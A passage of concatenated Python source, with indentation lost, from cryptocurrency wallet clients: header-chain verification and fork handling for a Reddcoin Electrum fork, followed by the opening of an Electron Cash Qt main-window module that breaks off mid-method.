__, forkpoint, prev_hash, first_hash = filename.split('_')
forkpoint = int(forkpoint)
prev_hash = (64-len(prev_hash)) * "0" + prev_hash # left-pad with zeroes
first_hash = (64-len(first_hash)) * "0" + first_hash
# forks below the max checkpoint are not allowed
if forkpoint <= constants.net.max_checkpoint():
delete_chain(filename, "deleting fork below max checkpoint")
return
# find parent (sorting by forkpoint guarantees it's already instantiated)
for parent in blockchains.values():
if parent.check_hash(forkpoint - 1, prev_hash):
break
else:
delete_chain(filename, "cannot find parent for chain")
return
b = Blockchain(config=config,
forkpoint=forkpoint,
parent=parent,
forkpoint_hash=first_hash,
prev_hash=prev_hash)
# consistency checks
h = b.read_header(b.forkpoint)
if first_hash != hash_header(h):
delete_chain(filename, "incorrect first hash for chain")
return
if not b.parent.can_connect(h, check_height=False):
delete_chain(filename, "cannot connect chain to parent")
return
chain_id = b.get_id()
assert first_hash == chain_id, (first_hash, chain_id)
blockchains[chain_id] = b
for filename in l:
instantiate_chain(filename)
def get_best_chain() -> 'Blockchain':
return blockchains[constants.net.GENESIS]
# block hash -> chain work; up to and including that block
_CHAINWORK_CACHE = {
"0000000000000000000000000000000000000000000000000000000000000000": 0, # virtual block at height -1
} # type: Dict[str, int]
def downloading_headers():
b = get_best_chain()
return b.download_headers
def init_headers_file_for_best_chain():
b = get_best_chain()
filename = b.path()
length = HEADER_SIZE * len(constants.net.CHECKPOINTS) * 2016
def reporthook(count, block_size, total_size):
global start_time, current_time
if count == 0:
start_time = time.time()
current_time = 0
return
duration = time.time() - start_time
progress_size = int(count * block_size)
speed = int(progress_size / (1024 * duration))
percent = min((count * block_size * 100 / total_size),100)
if (percent==100) or (time.time() - current_time > 1):
_logger.info(f"header download ... {percent:.2f}%, size {progress_size / (1024 * 1024):.2f} MB, {speed} KB/s, {duration:.2f} seconds passed")
current_time = time.time()
b.download_headers_pc = percent
def download_thread():
try:
import urllib.request, socket
socket.setdefaulttimeout(60 * 5)
_logger.info(f"downloading {constants.net.HEADERS_URL}")
opener = urllib.request.build_opener()
opener.addheaders = [('User-Agent', 'Electrum-Redd/' + ELECTRUM_VERSION)]
urllib.request.install_opener(opener)
urllib.request.urlretrieve(constants.net.HEADERS_URL, filename + '.tmp', reporthook)
os.rename(filename + '.tmp', filename)
_logger.info("done.")
except Exception as e:
_logger.error(f"download failed. Reason {e} while creating file {filename}")
open(filename, 'wb+').close()
with b.lock:
b.update_size()
b.download_headers = False
if not os.path.exists(filename) or os.path.getsize(filename) < length:
b.download_headers = True
b.download_headers_pc = 0
t = threading.Thread(target=download_thread)
t.daemon = True
t.start()
with b.lock:
b.update_size()
b.download_headers_pc = 100
# with open(filename, 'wb') as f:
# if length > 0:
# f.seek(length - 1)
# f.write(b'\x00')
# util.ensure_sparse_file(filename)
# with b.lock:
# b.update_size()
class Blockchain(Logger):
"""
Manages blockchain headers and their verification
"""
def __init__(self, config: SimpleConfig, forkpoint: int, parent: Optional['Blockchain'],
forkpoint_hash: str, prev_hash: Optional[str]):
assert isinstance(forkpoint_hash, str) and len(forkpoint_hash) == 64, forkpoint_hash
assert (prev_hash is None) or (isinstance(prev_hash, str) and len(prev_hash) == 64), prev_hash
# assert (parent is None) == (forkpoint == 0)
if 0 < forkpoint <= constants.net.max_checkpoint():
raise Exception(f"cannot fork below max checkpoint. forkpoint: {forkpoint}")
Logger.__init__(self)
self.config = config
self.forkpoint = forkpoint # height of first header
self.parent = parent
self._forkpoint_hash = forkpoint_hash # blockhash at forkpoint. "first hash"
self._prev_hash = prev_hash # blockhash immediately before forkpoint
self.lock = threading.RLock()
self.update_size()
self.kgw = KGW()
self.cache_headers = []
self.cache_kgw_size = 7 * 24 * 60
self.chunk_size = 2016
self.check_pow_from_ntime = 1394048078
self.download_headers = False
self.download_headers_pc = 0
def with_lock(func):
def func_wrapper(self, *args, **kwargs):
with self.lock:
return func(self, *args, **kwargs)
return func_wrapper
@property
def checkpoints(self):
return constants.net.CHECKPOINTS
def get_max_child(self) -> Optional[int]:
children = self.get_direct_children()
return max([x.forkpoint for x in children]) if children else None
def get_max_forkpoint(self) -> int:
"""Returns the max height where there is a fork
related to this chain.
"""
mc = self.get_max_child()
return mc if mc is not None else self.forkpoint
def get_direct_children(self) -> Sequence['Blockchain']:
with blockchains_lock:
return list(filter(lambda y: y.parent==self, blockchains.values()))
def get_parent_heights(self) -> Mapping['Blockchain', int]:
"""Returns map: (parent chain -> height of last common block)"""
with self.lock, blockchains_lock:
result = {self: self.height()}
chain = self
while True:
parent = chain.parent
if parent is None: break
result[parent] = chain.forkpoint - 1
chain = parent
return result
def get_height_of_last_common_block_with_chain(self, other_chain: 'Blockchain') -> int:
last_common_block_height = 0
our_parents = self.get_parent_heights()
their_parents = other_chain.get_parent_heights()
for chain in our_parents:
if chain in their_parents:
h = min(our_parents[chain], their_parents[chain])
last_common_block_height = max(last_common_block_height, h)
return last_common_block_height
@with_lock
def get_branch_size(self) -> int:
return self.height() - self.get_max_forkpoint() + 1
def get_name(self) -> str:
return self.get_hash(self.get_max_forkpoint()).lstrip('0')[0:10]
def check_header(self, header: dict) -> bool:
header_hash = hash_header(header)
height = header.get('block_height')
return self.check_hash(height, header_hash)
def check_hash(self, height: int, header_hash: str) -> bool:
"""Returns whether the hash of the block at given height
is the given hash.
"""
assert isinstance(header_hash, str) and len(header_hash) == 64, header_hash # hex
try:
return header_hash == self.get_hash(height)
except Exception:
return False
def fork(parent, header: dict) -> 'Blockchain':
if not parent.can_connect(header, check_height=False):
raise Exception("forking header does not connect to parent chain")
forkpoint = header.get('block_height')
self = Blockchain(config=parent.config,
forkpoint=forkpoint,
parent=parent,
forkpoint_hash=hash_header(header),
prev_hash=parent.get_hash(forkpoint-1))
self.assert_headers_file_available(parent.path())
open(self.path(), 'w+').close()
self.save_header(header)
# put into global dict. note that in some cases
# save_header might have already put it there but that's OK
chain_id = self.get_id()
with blockchains_lock:
blockchains[chain_id] = self
return self
@with_lock
def height(self) -> int:
return self.forkpoint + self.size() - 1
@with_lock
def size(self) -> int:
return self._size
@with_lock
def update_size(self) -> None:
p = self.path()
self._size = os.path.getsize(p)//HEADER_SIZE if os.path.exists(p) else 0
@classmethod
def verify_header(cls, header: dict, prev_header: str, bits: int, target: int, expected_header_hash: str=None) -> None:
if header.get('timestamp') < CHECK_POW_FROM_NTIME:
return
prev_hash = hash_header(prev_header)
_hash = hash_header(header)
height = header.get('block_height')
if expected_header_hash and expected_header_hash != _hash:
raise Exception("hash mismatches with expected: {} vs {}".format(expected_header_hash, _hash))
if prev_hash != header.get('prev_block_hash'):
raise Exception("prev hash mismatch: %s vs %s" % (prev_hash, header.get('prev_block_hash')))
if constants.net.TESTNET:
return
if bits != header.get('bits') and (height <= 260799 or height >= 270800 + (7 * 24 * 60)): # TODO fix the target calc around the posv switch
raise Exception("bits mismatch: %s vs %s" % (bits, header.get('bits')))
if height <= 260799:
_powhash = pow_hash_header(header)
if int('0x'+_powhash, 16) >= target:
raise Exception(f"insufficient proof of work: {int('0x'+_powhash, 16)} vs target {target}")
def verify_chunk(self, index: int, data: bytes) -> None:
num = len(data) // HEADER_SIZE
start_height = index * 2016
headers = [deserialize_header(data[i*HEADER_SIZE:(i+1)*HEADER_SIZE], start_height + i) for i in range(num)]
# get preceding headers to use in KGW
if len(self.cache_headers) == 0:
prev_chain = [self.read_header(x) for x in range((0, start_height - self.cache_kgw_size)[start_height - self.cache_kgw_size > 0], start_height)]
else:
prev_chain = self.cache_headers
prev_header = prev_chain[-1] if len(prev_chain) > 0 else None
chain_target = self.kgw.get_chain_target(prev_chain, headers)
for i, header in enumerate(headers):
height = header.get('block_height')
if height <= self.height():
prev_header = header
continue
bits, target = chain_target[i]
self.verify_header(header, prev_header, bits, target)
prev_header = header
self.cache_headers = prev_chain + headers
if len(self.cache_headers) > self.cache_kgw_size:
self.cache_headers = self.cache_headers[-self.cache_kgw_size:]
@with_lock
def path(self):
d = util.get_headers_dir(self.config)
if self.parent is None:
filename = 'blockchain_headers'
else:
assert self.forkpoint > 0, self.forkpoint
prev_hash = self._prev_hash.lstrip('0')
first_hash = self._forkpoint_hash.lstrip('0')
basename = f'fork2_{self.forkpoint}_{prev_hash}_{first_hash}'
filename = os.path.join('forks', basename)
return os.path.join(d, filename)
@with_lock
def save_chunk(self, index: int, chunk: bytes):
assert index >= 0, index
chunk_within_checkpoint_region = index < len(self.checkpoints)
# chunks in checkpoint region are the responsibility of the 'main chain'
if chunk_within_checkpoint_region and self.parent is not None:
main_chain = get_best_chain()
main_chain.save_chunk(index, chunk)
return
delta_height = (index * 2016 - self.forkpoint)
delta_bytes = delta_height * HEADER_SIZE
# if this chunk contains our forkpoint, only save the part after forkpoint
# (the part before is the responsibility of the parent)
if delta_bytes < 0:
chunk = chunk[-delta_bytes:]
delta_bytes = 0
truncate = not chunk_within_checkpoint_region
self.write(chunk, delta_bytes, truncate)
self.swap_with_parent()
def swap_with_parent(self) -> None:
with self.lock, blockchains_lock:
# do the swap; possibly multiple ones
cnt = 0
while True:
old_parent = self.parent
if not self._swap_with_parent():
break
# make sure we are making progress
cnt += 1
if cnt > len(blockchains):
raise Exception(f'swapping fork with parent too many times: {cnt}')
# we might have become the parent of some of our former siblings
for old_sibling in old_parent.get_direct_children():
if self.check_hash(old_sibling.forkpoint - 1, old_sibling._prev_hash):
old_sibling.parent = self
def _swap_with_parent(self) -> bool:
"""Check if this chain became stronger than its parent, and swap
the underlying files if so. The Blockchain instances will keep
'containing' the same headers, but their ids change and so
they will be stored in different files."""
if self.parent is None:
return False
if self.parent.get_chainwork() >= self.get_chainwork():
return False
self.logger.info(f"swapping {self.forkpoint} {self.parent.forkpoint}")
parent_branch_size = self.parent.height() - self.forkpoint + 1
forkpoint = self.forkpoint # type: Optional[int]
parent = self.parent # type: Optional[Blockchain]
child_old_id = self.get_id()
parent_old_id = parent.get_id()
# swap files
# child takes parent's name
# parent's new name will be something new (not child's old name)
self.assert_headers_file_available(self.path())
child_old_name = self.path()
with open(self.path(), 'rb') as f:
my_data = f.read()
self.assert_headers_file_available(parent.path())
assert forkpoint > parent.forkpoint, (f"forkpoint of parent chain ({parent.forkpoint}) "
f"should be at lower height than children's ({forkpoint})")
with open(parent.path(), 'rb') as f:
f.seek((forkpoint - parent.forkpoint)*HEADER_SIZE)
parent_data = f.read(parent_branch_size*HEADER_SIZE)
self.write(parent_data, 0)
parent.write(my_data, (forkpoint - parent.forkpoint)*HEADER_SIZE)
# swap parameters
self.parent, parent.parent = parent.parent, self # type: Optional[Blockchain], Optional[Blockchain]
self.forkpoint, parent.forkpoint = parent.forkpoint, self.forkpoint
self._forkpoint_hash, parent._forkpoint_hash = parent._forkpoint_hash, hash_raw_header(bh2u(parent_data[:HEADER_SIZE]))
self._prev_hash, parent._prev_hash = parent._prev_hash, self._prev_hash
# parent's new name
os.replace(child_old_name, parent.path())
self.update_size()
parent.update_size()
# update pointers
blockchains.pop(child_old_id, None)
blockchains.pop(parent_old_id, None)
blockchains[self.get_id()] = self
blockchains[parent.get_id()] = parent
return True
def get_id(self) -> str:
return self._forkpoint_hash
def assert_headers_file_available(self, path):
if os.path.exists(path):
return
elif not os.path.exists(util.get_headers_dir(self.config)):
raise FileNotFoundError('Electrum headers_dir does not exist. Was it deleted while running?')
else:
raise FileNotFoundError('Cannot find headers file but headers_dir is there. Should be at {}'.format(path))
@with_lock
def write(self, data: bytes, offset: int, truncate: bool=True) -> None:
filename = self.path()
self.assert_headers_file_available(filename)
with open(filename, 'rb+') as f:
if truncate and offset != self._size * HEADER_SIZE:
f.seek(offset)
f.truncate()
f.seek(offset)
f.write(data)
f.flush()
os.fsync(f.fileno())
self.update_size()
@with_lock
def save_header(self, header: dict) -> None:
delta = header.get('block_height') - self.forkpoint
data = bfh(serialize_header(header))
# headers are only _appended_ to the end:
assert delta == self.size(), (delta, self.size())
assert len(data) == HEADER_SIZE
self.write(data, delta*HEADER_SIZE)
self.swap_with_parent()
@with_lock
def read_header(self, height: int) -> Optional[dict]:
if height < 0:
return
if height < self.forkpoint:
return self.parent.read_header(height)
if height > self.height():
return
delta = height - self.forkpoint
name = self.path()
self.assert_headers_file_available(name)
with open(name, 'rb') as f:
f.seek(delta * HEADER_SIZE)
h = f.read(HEADER_SIZE)
if len(h) < HEADER_SIZE:
raise Exception('Expected to read a full header. This was only {} bytes'.format(len(h)))
if h == bytes([0])*HEADER_SIZE:
return None
return deserialize_header(h, height)
def header_at_tip(self) -> Optional[dict]:
"""Return latest header."""
height = self.height()
return self.read_header(height)
def is_tip_stale(self) -> bool:
STALE_DELAY = 8 * 60 * 60 # in seconds
header = self.header_at_tip()
if not header:
return True
# note: We check the timestamp only in the latest header.
# The Bitcoin consensus has a lot of leeway here:
# - needs to be greater than the median of the timestamps of the past 11 blocks, and
# - up to at most 2 hours into the future compared to local clock
# so there is ~2 hours of leeway in either direction
if header['timestamp'] + STALE_DELAY < time.time():
return True
return False
def get_hash(self, height: int) -> str:
def is_height_checkpoint():
within_cp_range = height <= constants.net.max_checkpoint()
at_chunk_boundary = (height+1) % 2016 == 0
return within_cp_range and at_chunk_boundary
if height == -1:
return '0000000000000000000000000000000000000000000000000000000000000000'
elif height == 0:
return constants.net.GENESIS
elif is_height_checkpoint():
index = height // 2016
h, t, _ = self.checkpoints[index]
return h
else:
header = self.read_header(height)
if header is None:
raise MissingHeader(height)
return hash_header(header)
def get_timestamp(self, height):
if height < len(self.checkpoints) * 2016 and (height+1) % 2016 == 0:
index = height // 2016
_, _, ts = self.checkpoints[index]
return ts
return self.read_header(height).get('timestamp')
def get_target(self, index: int, prev_chain = {}) -> int:
# compute target from chunk x, used in chunk x+1
if constants.net.TESTNET:
return 0, 0
if index == -1:
return MAX_NBITS, MAX_TARGET
if index < len(self.checkpoints):
h, t, _ = self.checkpoints[index]
return t
# new target
prev_chain = [self.read_header(x) for x in range((0, index - self.cache_kgw_size)[index - self.cache_kgw_size > 0], index)]
return self.kgw.get_target(prev_chain)
@classmethod
def bits_to_target(cls, bits: int) -> int:
bitsN = (bits >> 24) & 0xff
if not (0x03 <= bitsN <= 0x1d):
raise Exception("First part of bits should be in [0x03, 0x1d]")
bitsBase = bits & 0xffffff
if not (0x8000 <= bitsBase <= 0x7fffff):
raise Exception("Second part of bits should be in [0x8000, 0x7fffff]")
return bitsBase << (8 * (bitsN-3))
@classmethod
def target_to_bits(cls, target: int) -> int:
c = ("%064x" % target)[2:]
while c[:2] == '00' and len(c) > 6:
c = c[2:]
bitsN, bitsBase = len(c) // 2, int.from_bytes(bfh(c[:6]), byteorder='big')
if bitsBase >= 0x800000:
bitsN += 1
bitsBase >>= 8
return bitsN << 24 | bitsBase
def chainwork_of_header_at_height(self, height: int) -> int:
"""work done by single header at given height"""
chunk_idx = height // 2016 - 1
bits, target = self.get_target(chunk_idx)
work = ((2 ** 256 - target - 1) // (target + 1)) + 1
return work
@with_lock
def get_chainwork(self, height=None) -> int:
if height is None:
height = max(0, self.height())
if constants.net.TESTNET:
# On testnet/regtest, difficulty works somewhat different.
# It's out of scope to properly implement that.
return height
last_retarget = height // 2016 * 2016 - 1
cached_height = last_retarget
while _CHAINWORK_CACHE.get(self.get_hash(cached_height)) is None:
if cached_height <= -1:
break
cached_height -= 2016
assert cached_height >= -1, cached_height
running_total = _CHAINWORK_CACHE[self.get_hash(cached_height)]
while cached_height < last_retarget:
cached_height += 2016
work_in_single_header = self.chainwork_of_header_at_height(cached_height)
work_in_chunk = 2016 * work_in_single_header
running_total += work_in_chunk
_CHAINWORK_CACHE[self.get_hash(cached_height)] = running_total
cached_height += 2016
work_in_single_header = self.chainwork_of_header_at_height(cached_height)
work_in_last_partial_chunk = (height % 2016 + 1) * work_in_single_header
return running_total + work_in_last_partial_chunk
def can_connect(self, header: dict, check_height: bool=True) -> bool:
if header is None:
return False
height = header['block_height']
if check_height and self.height() != height - 1:
return False
if height == 0:
return hash_header(header) == constants.net.GENESIS
prev_header = self.read_header(height - 1)
if not prev_header:
return False
try:
prev_hash = self.get_hash(height - 1)
except:
return False
if prev_hash != header.get('prev_block_hash'):
return False
try:
bits, target = self.get_target(height)
except MissingHeader:
return False
try:
self.verify_header(header, prev_header, bits, target)
except BaseException as e:
return False
return True
def connect_chunk(self, idx: int, hexdata: str) -> bool:
assert idx >= 0, idx
try:
data = bfh(hexdata)
self.verify_chunk(idx, data)
self.save_chunk(idx, data)
return True
except BaseException as e:
self.logger.info(f'verify_chunk idx {idx} failed: {repr(e)}')
return False
def get_checkpoints(self):
# for each chunk, store the hash of the last block and the target after the chunk
cp = []
n = self.height() // 2016
for index in range(n):
h = self.get_hash((index+1) * 2016 -1)
target = self.get_target(index)
# Reddcoin: also store the timestamp of the last block
tstamp = self.get_timestamp((index+1) * 2016 - 1)
cp.append((h, target, tstamp))
return cp
def check_header(header: dict) -> Optional[Blockchain]:
"""Returns any Blockchain that contains header, or None."""
if type(header) is not dict:
return None
with blockchains_lock: chains = list(blockchains.values())
for b in chains:
if b.check_header(header):
return b
return None
def can_connect(header: dict) -> Optional[Blockchain]:
"""Returns the Blockchain that has a tip that directly links up
with header, or None.
"""
with blockchains_lock: chains = list(blockchains.values())
for b in chains:
if b.can_connect(header):
return b
return None
def get_chains_that_contain_header(height: int, header_hash: str) -> Sequence[Blockchain]:
"""Returns a list of Blockchains that contain header, best chain first."""
with blockchains_lock: chains = list(blockchains.values())
chains = [chain for chain in chains
if chain.check_hash(height=height, header_hash=header_hash)]
chains = sorted(chains, key=lambda x: x.get_chainwork(), reverse=True)
return chains
|
main_window.py
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import sys, time, threading
import os, json, traceback
import shutil
import csv
from decimal import Decimal as PyDecimal # Qt 5.12 also exports Decimal
import base64
from functools import partial
from collections import OrderedDict
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from electroncash import keystore, get_config
from electroncash.address import Address, ScriptOutput
from electroncash.bitcoin import COIN, TYPE_ADDRESS, TYPE_SCRIPT
from electroncash import networks
from electroncash.plugins import run_hook
from electroncash.i18n import _, ngettext, pgettext
from electroncash.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, format_satoshis_plain_nofloat,
NotEnoughFunds, NotEnoughFundsSlp, NotEnoughUnfrozenFundsSlp, ExcessiveFee,
UserCancelled, InvalidPassword, bh2u, bfh,
format_fee_satoshis, Weak, print_error)
import electroncash.web as web
from electroncash import Transaction
from electroncash import util, bitcoin, commands
from electroncash import paymentrequest
from electroncash.wallet import Multisig_Wallet, sweep_preparations
try:
from electroncash.plot import plot_history
except:
plot_history = None
import electroncash.web as web
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, BTCkBEdit, BTCSatsByteEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .popup_widget import ShowPopupLabel, KillPopupLabel, PopupWidget
from .util import *
import electroncash.slp as slp
from electroncash.slp_coinchooser import SlpCoinChooser
from electroncash.slp_checker import SlpTransactionChecker
from .amountedit import SLPAmountEdit
from electroncash.util import format_satoshis_nofloat
from .slp_create_token_genesis_dialog import SlpCreateTokenGenesisDialog
from .bfp_download_file_dialog import BfpDownloadFileDialog
from .bfp_upload_file_dialog import BitcoinFilesUploadDialog
try:
# pre-load QtMultimedia at app start, if possible
# this is because lazy-loading it from within Python
# callbacks led to crashes on Linux, likely due to
# bugs in PyQt5 (crashes wouldn't happen when testing
# with PySide2!).
from PyQt5.QtMultimedia import QCameraInfo
del QCameraInfo # defensive programming: not always available so don't keep name around
except ImportError as e:
pass # we tried to pre-load it, failure is ok; camera just won't be available
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(Qt.PointingHandCursor)
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electroncash.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
# Note: self.clean_up_connections automatically detects signals named XXX_signal and disconnects them on window close.
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
cashaddr_toggled_signal = pyqtSignal()
slp_validity_signal = pyqtSignal(object, object)
history_updated_signal = pyqtSignal()
labels_updated_signal = pyqtSignal() # note this signal occurs when an explicit update_labels() call happens. Interested GUIs should also listen for history_updated_signal as well which also indicates labels may have changed.
on_timer_signal = pyqtSignal() # functions wanting to be executed from timer_actions should connect to this signal, preferably via Qt.DirectConnection
status_icon_dict = dict() # app-globel cache of "status_*" -> QIcon instances (for update_status() speedup)
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.wallet = wallet
self.config = config = gui_object.config
self.non_slp_wallet_warning_shown = False
self.force_use_single_change_addr = _('Change addresses behavior is not customizable for SLP wallets') if self.is_slp_wallet else False
if self.force_use_single_change_addr and not self.wallet.use_change:
self.wallet.use_change = True
self.wallet.storage.put('use_change', self.wallet.use_change)
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.not_enough_funds_slp = False
self.not_enough_unfrozen_funds_slp = False
self.op_return_toolong = False
self.internalpluginsdialog = None
self.externalpluginsdialog = None
self.hardwarewalletdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
self._tx_dialogs = Weak.Set()
self._slp_dialogs = Weak.Set()
self.tx_update_mgr = TxUpdateMgr(self) # manages network callbacks for 'new_transaction' and 'verified2', and collates GUI updates from said callbacks as a performance optimization
self.is_schnorr_enabled = self.wallet.is_schnorr_enabled # This is a function -- Support for plugins that may be using the 4.0.3 & 4.0.4 API -- this function used to live in this class, before being moved to Abstract_Wallet.
self.send_tab_opreturn_widgets, self.receive_tab_opreturn_widgets = [], [] # defaults to empty list
self._shortcuts = Weak.Set() # keep track of shortcuts and disable them on close
self.create_status_bar()
self.need_update = threading.Event()
self.labels_need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.fee_unit = config.get('fee_unit', 0)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.slp_mgt_tab = self.create_slp_mgt_tab()
self.converter_tab = self.create_converter_tab()
self.slp_history_tab = self.create_slp_history_tab()
self.slp_token_id = None
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
# clears/inits the opreturn widgets
self.on_toggled_opreturn(bool(self.config.get('enable_opreturn')))
def add_optional_tab(tabs, tab, icon, description, name, default=False):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), default):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.converter_tab, QIcon(":icons/tab_converter.svg"), _("Address Converter"), "converter", True)
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
if self.is_slp_wallet:
add_optional_tab(tabs, self.slp_mgt_tab, QIcon(":icons/tab_slp_icon.png"), _("Tokens"), "tokens")
add_optional_tab(tabs, self.slp_history_tab, QIcon(":icons/tab_slp_icon.png"), _("SLP History"), "slp_history", True)
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.init_menubar()
wrtabs = Weak.ref(tabs) # We use a weak reference here to help along python gc of QShortcut children: prevent the lambdas below from holding a strong ref to self.
self._shortcuts.add( QShortcut(QKeySequence("Ctrl+W"), self, self.close) )
# Below is now addded to the menu as Ctrl+R but we'll also support F5 like browsers do
self._shortcuts.add( QShortcut(QKeySequence("F5"), self, self.update_wallet) )
self._shortcuts.add( QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs() and wrtabs().setCurrentIndex((wrtabs().currentIndex() - 1)%wrtabs().count())) )
self._shortcuts.add( QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs() and wrtabs().setCurrentIndex((wrtabs().currentIndex() + 1)%wrtabs().count())) )
for i in range(tabs.count()):
self._shortcuts.add( QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs() and wrtabs().setCurrentIndex(i)) )
self.cashaddr_toggled_signal.connect(self.update_cashaddr_icon)
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.gui_object.update_available_signal.connect(self.on_update_available) # shows/hides the update_available_button, emitted by update check mechanism when a new version is available
self.history_list.setFocus(True)
self.slp_history_list.setFocus(True)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet()
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['blockchain_updated', 'wallet_updated',
'new_transaction', 'status', 'banner', 'verified2',
'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
@property
def is_slp_wallet(self):
return self.wallet.is_slp
_first_shown = True
def showEvent(self, event):
super().showEvent(event)
if event.isAccepted() and self._first_shown:
self._first_shown = False
weakSelf = Weak.ref(self)
# do this immediately after this event handler finishes -- noop on everything but linux
QTimer.singleShot(0, lambda: weakSelf() and weakSelf().gui_object.lin_win_maybe_show_highdpi_caveat_msg(weakSelf()))
def update_token_type_combo(self):
self.token_type_combo.clear()
self.receive_token_type_combo.clear()
self.token_type_combo.addItem(QIcon(':icons/tab_coins.png'), 'None', None)
self.receive_token_type_combo.addItem(QIcon(':icons/tab_coins.png'), 'None', None)
try:
token_types = self.wallet.token_types
except AttributeError:
pass
else:
sorted_items = sorted(token_types.items(), key=lambda x:x[1]['name'])
for token_id, i in sorted_items:
if i['decimals'] != '?':
self.token_type_combo.addItem(QIcon(':icons/tab_slp_icon.png'),i['name'], token_id)
self.receive_token_type_combo.addItem(QIcon(':icons/tab_slp_icon.png'),i['name'], token_id)
def on_history(self, event, *args):
# NB: event should always be 'on_history'
if not args or args[0] is self.wallet:
self.new_fx_history_signal.emit()
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_history(self):
if self.cleaned_up: return
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_quotes(self):
if self.cleaned_up: return
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def toggle_tab(self, tab, forceStatus = 0):
# forceStatus = 0 , do nothing
# forceStatus = 1 , force Show
